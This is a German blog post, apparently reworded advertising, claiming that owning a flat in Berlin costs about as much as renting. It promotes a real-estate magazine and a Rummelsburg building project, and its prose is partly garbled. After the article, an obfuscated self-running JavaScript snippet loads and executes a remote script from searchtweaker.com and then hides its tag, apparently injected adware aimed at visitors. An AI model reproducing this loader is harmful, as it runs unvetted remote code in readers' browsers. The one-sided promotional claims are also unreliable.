* Startseite     * Über...     * Archiv     * Gästebuch     * Kontakt     * Abonnieren



* Letztes Feedback






Die Mieten wachsen weiter: Eigentumswohnung in Berlin auf Dauer preiswertere Alternative

Wohneigentum ist einfacher bezahlbar, als viele Menschen meinen. Besonders bei vielen Familien unterscheidet sich oft die Monatsbelastung der Finanzierung des Eigenheims kaum von der Kaltmiete. Dies ergab eine aktuelle Analyse des Deutschen Sparkassen- und Giroverbandes (D S G V). Gegenstand der Untersuchung ist die erstmals vorgenommene Berechnung der Haushalts-Budgets von 55.000 Familien in der Bundesrepublik Deutschland.

Die Mietkosten verkörpern demnach in der Regel mit Abstand den größten Kostenpunkten, danach kommenVerkehrsmittel und Verpflegung. Die monatlichen Aufwendungen zur Kredittilgung beim Kauf eines Eigenheims unterschieden sich hierbei im Vergleich nur in sehr geringem Maße von den monatlichen Mietkosten, so die Autoren der Untersuchung. Die monetäre Anforderung je Monat bleibe im Fall von Wohneigentum über alle Lebensphasen konstant. Sofern die Tilgungsrate entsprechend dem jeweiligen Einkommen angepasst und auf lange Sicht gestreut werde, sei die Bezahlung der persönlichen vier Wände gut zu realisieren. Wohnungseigentum offeriert damit zudem für alle Einkommensklassen eine lohnenswerte Option gegenüber unsicheren, tendenziell steigenden Mieten.

Eigene Immobilie in der Hauptstadt bietet angemessene Alternative zu wachsenden Mietpreise


Insbesondere Berlins Wohnungsmieter sind mit der Lage gut bekannt: In der Hauptstadt stiegen die Neumieten zwischen 2007 und 2012 um rund 40 % an. Laut einer aktuellen Erhebung des Marktforschungsinstituts TNS Infratest müssen die Bürger der Bundeshauptstadt mit 38 % im Durchschnitt mehr von ihrem Haushalts Einkommen für Wohnkosten bezahlen als der Rest der Deutschland. Hier bleiben es gerade mal 34 Prozent.

Parallel zu den anziehenden Mieten steigt auch das Interesse an Wohneigentum . Kaufkräftige Investoren setzen auf Immobilieneigentum in der Hauptstadt. Das internationale Wirtschaftsprüfungs-Unternehmen „ PricewaterhouseCoopers International Limited  (PwC) fand heraus, dass Berlin nach der bayerischen Landeshauptstadt München den wohl attraktivsten Immobilienmarkt in Europa bietet. Damit rangiert die Spreemetropole noch vor Metropolen wie z. B. Paris sowie London. Auf lange Zeit wird zudem der Erwerb von Immobilien in der Hauptstadt jedoch teurer sein: Um den doppelten Haushalt 2014/2015 finanzieren zu können, hat nun der Berliner Senat entschieden, die Steuer für Grunderwerb auf 6 % zu erhöhen. Berlin liegt somit an der Spitze aller Bundesländer  . Allein Schleswig-Holstein fordert mit 6,5 % noch mehr Steuer für Grunderwerb. Anleger dürfen die zusätzlichen Kosten auf die Mietpreise anrechnen. In erster Linie private Eigentümer einer Wohnung in der Spreemetropole werden dadurch von der Preissteigerung betroffen sein. Die Steuer, die einmalig bei dem Erwerb eines Grundstücks eingefordert wird, soll nun zum 1.Januar 2014 in Kraft treten.

Zur Zeit sehr gute Bedingungen für die Traumimmobilie nicht verstreichen lassen!

Auch die Zinswerte für Baudarlehen, die sich lange Zeit auf dem historischen Tiefststand befunden hatten, steigen langsam wieder . Somit dürften zukünftig  Kredite für den Hausbau und die Immobilie in der Hauptstadt teurer werden. Wer jetzt schon an die eigenen vier Wände in der Hauptstadt denkt, darf seinen persönlichen Traum deshalb nicht lange warten lassen.

Einen kreativen Einblick und viel Interessantes zu schönen Wohnungseigentum in der Hauptstadt bietet die Juli-Ausgabe von Exklusiv ‒ Immobilien in Berlin exklusiv-immobilien-berlin.de/ der Regionalen Immobilien Verlagsgesellschaft mbH . Zusätzlich zu den neuesten Wohnhighlights Berlins präsentiert die Redaktion unter anderem ebenso gehobene Bauensembles, Top-Lagen sowie darüber hinaus Konzepte für eine edle Inneneinrichtung . Besondere Wohnungsprojekte in Berlin werden detailliert erklärt und umfassend durch Bildstrecken veranschaulicht. Zu jeder Ausgabe des Magazins wird aus der Menge an anspruchsvollen Berliner Wohnimmobilien eine „Immobilie des Monats“ ausgesucht. Aber der exklusiven Leserschaft werden nicht nur  Immobilien in Berlin, sondern ebenso auch zahlreiche nicht zu vernachlässigende Themen rund um das gehobene Wohneigentum in Berlin präsentiert.

Top-Lagen für Immobilien in Berlin


 Eine individuelle Rubrik zeigt edle Innenausstattung für die persönlichen vier Wände, zum Beispiel die schöne Küchenkollektion von Osterfield, geräumige XXL-Duschen oder Anregungen für das eigene Home Spa von Grohe. Wie in jeder Ausgaben lädt Exklusiv ‒ Immobilien in Berlin exklusiv-immobilien-berlin.de/ seine Leserschaft zu einem „Spaziergang durch die Stadt” ein. Diesesmal geht es in den Berliner jüngsten Bezirk, nämlich nach Friedrichshain-Kreuzberg. Über weiteren Top Gegenden Berlins wird am Beispiel aktueller Bauprojekte umfassend informiert.

 Eine neue Blüte erlebt gegenwärtig zum Beispiel der zu Lichtenberg gehörende Kiez Rummelsburg. Unter anderem angesichts der baldigen Vollendung des Fernbahnhofs Ostkreuz gewinnt der Kiez zunehmend an Anziehungskraft. Dank seiner zentralen Lage bietet Rummelsburg eine gute Verbindung in Richtung Berlin Mitte. Nichtsdestotrotz müssen Anwohner nicht auf Erholung verzichten: Die Spree mit der ruhigen Rummelsburger Bucht und die Halbinsel Stralau befinden sich letztendlich nur einen Katzensprung entfernt. Anfang Mai wurde in Rummelsburg offiziell das Fundament für das Bau-Projekt „(G)lück 74” gelegt. In der Lückstraße, in der Nähe des Nöldnerplatzes, entstehen verhältnismäßig preisgünstige sowie zugleich gehobene Wohneigentum. Das Angebot reicht vom schicken 59 Quadratmeter-Innenstadt-Apartment bis zur 150 M² umfassenden Familienwohnung. Interessierte können aus insgesamt 26 Grundrissen wählen.

Detallierte Informationen zu diesen und anderen Wohn-Projekten und Top-Lagen in der Hauptstadt enthält die 3. Ausgabe des Magazins Exklusiv ‒ Immobilien in Berlin exklusiv-immobilien-berlin.de/ vom Juli/August 2013. Dazu kommen zudem Infos zu den verschiedenen rechtlichen Aspekten, architektonischen Höhepunkten, Berliner Bezirken, der perfekten Innenausstattung ebenso wie aktuellen Wohntrends.

Das Magazin erscheint aller zwei Monate, sie enthält viele fachkundige, fundierte Beiträge von markterfahrenen Immobilienprofis, verschiedenen Hausbau-Unternehmern, Architekten sowie Bauanwälten aus der Hauptstadt.

Exklusiv - Immobilien in Berlin gibt es im gut sortierten Zeitschriftenhandel und darüber hinaus auch im Internet. Mehr Informationen finden Sie auf exklusiv-immobilien-berlin.de/ .
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
12.9.13 16:37
 


Werbung


bisher 0 Kommentar(e)     TrackBack-URL

Name:
Email:
Website:
E-Mail bei weiteren Kommentaren
Informationen speichern (Cookie)



 Smileys einfügen



Verantwortlich für die Inhalte ist der Autor. Dein kostenloses Blog bei myblog.de! Datenschutzerklärung
Werbung